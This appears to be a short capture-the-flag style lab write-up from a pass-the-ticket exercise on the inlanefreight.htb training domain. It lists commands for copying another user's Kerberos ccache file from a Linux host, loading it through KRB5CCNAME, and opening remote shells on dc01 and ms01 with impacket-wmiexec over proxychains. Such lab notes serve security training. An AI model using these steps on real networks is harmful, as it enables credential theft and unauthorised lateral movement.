But first we have to get the Julio's ccache file from the linux machine

ssh svc_workstations@inlanefreight.htb@10.129.204.23 -p 2222
ls -la

Then we will change the permission so that we can copy it using scp

chmod 644 krb5cc_647401106_ZN5b8D
scp -P 2222 svc_workstations@inlanefreight.htb@10.129.215.254:/tmp/krb5cc_647401106_ZN5b8D .

Then we are going to export the ccache file so that we can connect to the dc01 as julio

export KRB5CCNAME=/home/kyou/academy-htb/password-attacks/pass-the-ticket/krb5cc_647401106_ZN5b8D

Then just use proxychains4 from the home directory to connect to dc01 

./proxychains4 impacket-wmiexec dc01 -k
./proxychains4 impacket-wmiexec ms01 -k

`